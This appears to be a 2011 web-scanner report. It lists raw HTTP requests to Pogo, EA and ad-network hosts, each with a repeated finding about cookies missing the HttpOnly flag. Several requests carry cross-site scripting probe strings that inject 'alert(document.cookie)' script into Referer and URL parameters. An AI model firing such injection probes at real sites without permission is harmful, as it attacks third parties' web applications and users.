GET /games/risk HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=2111603&Page=&PluID=0&Pos=7971\ HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5Eeb25Per_Played%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0%5EebVideoStarted%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0&OptOut=0&ebRandom=0.4333476326428354&flv=10.1103&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: E2=09MY820wsF; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/cribbage HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/rainy-day-spider-solitaire HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fs-bin/stat?id=FLenzF8lvbI&offerid=78941&type=3&subid=0&tmpid=1826 HTTP/1.1 Host: click.linksynergy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html> <head> <title>301 Moved Permanently</title> </head> <body> <p>The page you are requesting has moved to <a href="&partnerId=30&siteID=FLenzF8lvbI-jRY9Ep2QlsT7E2gTD46DFg">&partnerId=30&siteI ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/4252/4762/6670-15.js?cb=0.8619239274412394 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; ses15=4762^1; rpb=4210%3D1; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; cd=false; au=GIP9HWY4-MADS-10.208.38.239
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:25:15 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^1^1294536315^1294536315; expires=Sun, 16-Jan-2011 01:25:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/bejeweled2 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/yahtzee-party HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm HTTP/1.1 Host: r.turn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=3011330574290390485; rds=undefined%7Cundefined%7Cundefined%7C14983; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rv=1; rrs=undefined%7Cundefined%7Cundefined%7C4;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:25:52 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1 Host: r1.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; F1=BA5Dp0EBAAAABAAAAEAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ACID=Bc330012940999670074; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; ROLL=v5Q2V0cRVUyqcZK!;
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 09 Jan 2011 02:25:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: /;ord=0846642328? Set-Cookie: C2=3yRKNJpwIg02FlBCdbdRZA7gHw8jGHgsjhADgaUKCKCC9mUBwxKkmhUiGgK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:58 GMT; path=/ Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click Set-Cookie: 0846642328=_4d290f90,0846642328,758630^906164^1^0,1_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 02:25:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 142
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2f%3bord%3d0846642328%3f">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; F1=BQBFp0EBAAAABAAAAMAAaEA; BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.944664.755399.0XMC Set-Cookie: F1=BUBFp0kAAAAAHb4CAEAAgEABAAAABAAAAQAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: BASE=YnQIx9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WF!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: ROLL=v5Q2Q0cRVUyqcZa/vGc3WhvkMxIiWOS7HgfCaOA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: 72318651=_4d291415,1206372681,755399^944664^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:09 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=B4hZi0EBAAAABAAAAcAAgEA; BASE=YnQI99MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YM!; ROLL=v5Q2T0cD6byq6qaxJoe34Sv8XRJi49SB7jfC09AP2YSOminn1Wmq7LDEe81vdCC!; C2=y/8JNJpwIg02FAGCdbdBgB7gHw8jGiksjhADgaAc; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:29:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.906164.758630.0XMC Set-Cookie: C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: F1=BA5Dp0EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:29:52 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 595
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; F1=BA5Dp0EBAAAABAAAAEAAgEA; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ROLL=v5Q2V0cRVUyqcZK!
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:48:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.955433.777340.0XMC Set-Cookie: C2=wPRKNJpwIg02FtBCdbdRbA7gHw8jGPgsjhADga0K; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: F1=BA/Ep0EBAAAABAAAAIAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: 17871065=_4d2913f0,4120808867,777340^955433^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:48:32 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1579
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=BA/Ep0EBAAAABAAAAIAAaEA; BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; C2=4PRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0K; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.949895.777340.0XMC Set-Cookie: C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: F1=BQBFp0EBAAAABAAAAMAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: 49979532=_4d291414,0737842127,777340^949895^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:08 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/technology-12126880 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=160559081.1294536631.1.1.utmcsr=peanutlabs.com|utmccn=(referral)|utmcmd=referral|utmcct=/userGreeting.php; __utma=160559081.396106583.1294536631.1294536631.1294536631.1; pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /js/iFrame/index.php?userId=998826224-3432-8939b981e2 HTTP/1.1 Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=roj6d8htea48u7e576mme7s3h2; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=t8hoe1ig0k16bn396grb2ghf02; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hasbro HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:29 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=t8hoe1ig0k16bn396grb2ghf02; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70504
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=27lnus2ntqriv5k00j2k40ng93; path=/
